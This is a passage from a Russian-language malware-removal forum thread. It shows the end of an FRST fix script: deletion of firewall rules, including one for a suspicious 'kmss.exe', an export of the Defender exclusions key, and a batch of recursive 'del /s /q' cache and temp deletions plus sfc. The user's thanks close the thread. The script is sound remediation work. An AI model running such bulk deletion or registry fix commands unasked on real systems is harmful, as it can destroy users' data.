FirewallRules: [{4EC546A3-4F98-4514-903E-BDCBAAA6F434}] => (Allow) D:\Steam Games D\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe => Нет файла
FirewallRules: [{C7B4252A-84FB-40F5-909A-F0BBFFE64185}] => (Allow) D:\Steam Games D\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe => Нет файла
FirewallRules: [TCP Query User{734C1942-9EF3-4BE1-9BF9-BC39B0B9ABF0}C:\program files\bridge\bridge.exe] => (Allow) C:\program files\bridge\bridge.exe => Нет файла
FirewallRules: [UDP Query User{56C5E00C-B97B-464C-A7A5-D4CB50165420}C:\program files\bridge\bridge.exe] => (Allow) C:\program files\bridge\bridge.exe => Нет файла
FirewallRules: [{1A57940C-80FD-43B0-9B36-40DE0DD1B2BE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\RimWorld\RimWorldWin64.exe => Нет файла
FirewallRules: [{E998D65C-11CB-49BD-A675-D3F6733B3DBE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\RimWorld\RimWorldWin64.exe => Нет файла
FirewallRules: [{1C73CAFA-D8B4-42C5-A3FB-B736C06BE1B8}] => (Allow) C:\Program Files\Red Giant\PluralEyes 4\PluralEyes 4.exe => Нет файла
FirewallRules: [{3E8B58C6-22FA-4ED0-B1F8-196AB936CE71}] => (Allow) C:\Program Files\Red Giant\PluralEyes 4\PEServer.exe => Нет файла
FirewallRules: [TCP Query User{4AAB7664-EDEB-494B-B7F1-5110638FB1DE}C:\adobe\adobe premiere pro 2023\cephtmlengine\cephtmlengine.exe] => (Block) C:\adobe\adobe premiere pro 2023\cephtmlengine\cephtmlengine.exe => Нет файла
FirewallRules: [UDP Query User{68E39CE4-66E5-468D-89B2-1C2E8E3082FE}C:\adobe\adobe premiere pro 2023\cephtmlengine\cephtmlengine.exe] => (Block) C:\adobe\adobe premiere pro 2023\cephtmlengine\cephtmlengine.exe => Нет файла
FirewallRules: [TCP Query User{09446944-F348-407C-B158-5545942E7492}C:\adobe\adobe after effects 2023\support files\cephtmlengine\cephtmlengine.exe] => (Block) C:\adobe\adobe after effects 2023\support files\cephtmlengine\cephtmlengine.exe => Нет файла
FirewallRules: [UDP Query User{094B6E72-5153-484D-8D75-1F249F384D2A}C:\adobe\adobe after effects 2023\support files\cephtmlengine\cephtmlengine.exe] => (Block) C:\adobe\adobe after effects 2023\support files\cephtmlengine\cephtmlengine.exe => Нет файла
FirewallRules: [{1409E25B-C2CB-4C14-9CF9-FC37B55E8C6B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BloonsTD6\BloonsTD6.exe => Нет файла
FirewallRules: [{C41F5593-76C0-48A9-A577-EC11DC07D29E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\BloonsTD6\BloonsTD6.exe => Нет файла
FirewallRules: [{26A586D0-8E27-4071-A484-87E8277FAD45}] => (Allow) D:\Steam Games D\steamapps\common\Total War WARHAMMER III\launcher\launcher.exe => Нет файла
FirewallRules: [{526318CD-D897-4291-9F69-3993BEC0B951}] => (Allow) D:\Steam Games D\steamapps\common\Total War WARHAMMER III\launcher\launcher.exe => Нет файла
FirewallRules: [TCP Query User{C26E1697-7CEC-45BC-B05E-6BA0D06D60FC}D:\steam games d\steamapps\common\total war warhammer iii\warhammer3.exe] => (Block) D:\steam games d\steamapps\common\total war warhammer iii\warhammer3.exe => Нет файла
FirewallRules: [UDP Query User{A37FA253-5710-4B60-9835-E3885F8F9703}D:\steam games d\steamapps\common\total war warhammer iii\warhammer3.exe] => (Block) D:\steam games d\steamapps\common\total war warhammer iii\warhammer3.exe => Нет файла
FirewallRules: [TCP Query User{016A2E9F-1DD7-4929-AB85-F6FA46B821F8}C:\users\xu33u\appdata\local\discord\app-1.0.9013\discord.exe] => (Allow) C:\users\xu33u\appdata\local\discord\app-1.0.9013\discord.exe => Нет файла
FirewallRules: [UDP Query User{1A7FB0DE-3109-4C13-A0DD-6507F36D22DE}C:\users\xu33u\appdata\local\discord\app-1.0.9013\discord.exe] => (Allow) C:\users\xu33u\appdata\local\discord\app-1.0.9013\discord.exe => Нет файла
FirewallRules: [{6D2FB5F5-EA9C-4E44-9D5B-DEB39AB48CFE}] => (Allow) D:\programi\Voicemod Desktop\VoicemodDesktop.exe => Нет файла
FirewallRules: [{1D718F5C-CAC9-4A58-806C-0C592EC7543D}] => (Allow) D:\programi\Voicemod Desktop\VoicemodDesktop.exe => Нет файла
FirewallRules: [{A0D0048B-9399-4809-8561-A707BDF909C9}] => (Allow) D:\_Work\_Utilities\Crazybump\CrazyBump.exe => Нет файла
FirewallRules: [{070D1718-2EA8-4EEC-B32A-55204F4ED580}] => (Allow) D:\_Work\_Utilities\Crazybump\CrazyBump.exe => Нет файла
FirewallRules: [TCP Query User{5BE85B6C-5F17-4558-B372-90F203F67FB0}D:\riot games\riot client\riotclientservices.exe] => (Allow) D:\riot games\riot client\riotclientservices.exe => Нет файла
FirewallRules: [UDP Query User{2BC5F19D-F0DF-4576-87B8-22EAC85A921A}D:\riot games\riot client\riotclientservices.exe] => (Allow) D:\riot games\riot client\riotclientservices.exe => Нет файла
FirewallRules: [{0831A3DC-EF09-4D00-91ED-337E86C7CFA3}] => (Allow) D:\Steam Games D\steamapps\common\Space Station 14 Playtest\Space Station 14 Launcher.exe => Нет файла
FirewallRules: [{89362BFE-E86B-455F-BA27-74682B0C0445}] => (Allow) D:\Steam Games D\steamapps\common\Space Station 14 Playtest\Space Station 14 Launcher.exe => Нет файла
FirewallRules: [{ED390FDB-18D3-448E-92EC-E9290AF952DD}] => (Allow) D:\_Work\_Utilities\WorldCreator\WorldCreator.exe => Нет файла
FirewallRules: [{7268C3EE-F082-4BC4-B4FD-BAF4EC1412C0}] => (Allow) D:\_Work\_Utilities\WorldCreator\WorldCreator.exe => Нет файла
FirewallRules: [TCP Query User{84209CAD-4E51-42E8-B27D-9614D6ECFCD4}D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3_dx11.exe => Нет файла
FirewallRules: [UDP Query User{912292C9-630A-4035-A744-8CDFCFA710C0}D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3_dx11.exe] => (Allow) D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3_dx11.exe => Нет файла
FirewallRules: [TCP Query User{F333B6CD-1E78-4C13-A70A-52CE2A1D8351}D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3.exe] => (Allow) D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3.exe => Нет файла
FirewallRules: [UDP Query User{22F3B031-24AB-479B-97C7-F9B445BEBC11}D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3.exe] => (Allow) D:\torrent\baldur's gate 3 (2023)\baldurs gate 3\bin\bg3.exe => Нет файла
FirewallRules: [TCP Query User{B0C91B84-C34D-468D-B7AF-A05810B736A8}D:\programi\softphonepro\softphonepro.exe] => (Allow) D:\programi\softphonepro\softphonepro.exe => Нет файла
FirewallRules: [UDP Query User{CBA6DA88-7318-4E07-9D83-D90E30431646}D:\programi\softphonepro\softphonepro.exe] => (Allow) D:\programi\softphonepro\softphonepro.exe => Нет файла
FirewallRules: [{A9B1EAB8-EB2E-4A16-9326-0A43B22E74AE}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Kerbal Space Program\PDLauncher\LauncherPatcher.exe => Нет файла
FirewallRules: [{04315FC4-7FE6-497D-8B4B-2651FBFEAB8E}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Kerbal Space Program\PDLauncher\LauncherPatcher.exe => Нет файла
FirewallRules: [{85EAE547-354A-4965-AFC3-9992996D54CA}] => (Block) Z:\programi\Adobe Photoshop 2024\Photoshop.exe => Нет файла
FirewallRules: [TCP Query User{90474258-84A1-4830-A57F-2634E249BEE1}C:\windows\files\bin\kmss.exe] => (Allow) C:\windows\files\bin\kmss.exe => Нет файла
FirewallRules: [UDP Query User{0B5CAB59-46C9-4FD0-A02F-54CD92FB29C9}C:\windows\files\bin\kmss.exe] => (Allow) C:\windows\files\bin\kmss.exe => Нет файла
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
StartBatch:
del /s /q C:\Windows\SoftwareDistribution\download\*.*
del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*"
del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Cache\*.*"
del /s /q C:\Windows\Temp\*.*
del /s /q "%userprofile%\AppData\Local\temp\*.*"
sfc /scannow
endbatch:
Reboot:
End::[/CODE]Запустите FRST.EXE/FRST64.EXE, нажмите один раз [B]Исправить[/B] и подождите. Программа создаст лог-файл ([B]Fixlog.txt[/B]). Упакуйте его в архив .RAR или .7z с максимальным сжатием и прикрепите к своему следующему сообщению.
Компьютер будет перезагружен.
16.12.2023, 12:05
lostintired

Вложений: 1

Архив с Fixlog
16.12.2023, 12:54
Vvvyg

Порядок.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите. Логи, карантин и другие файлы, созданные программой, будут удалены.
16.12.2023, 13:30
lostintired

Благодарю за помощь, очень выручили! Тема закрыта :)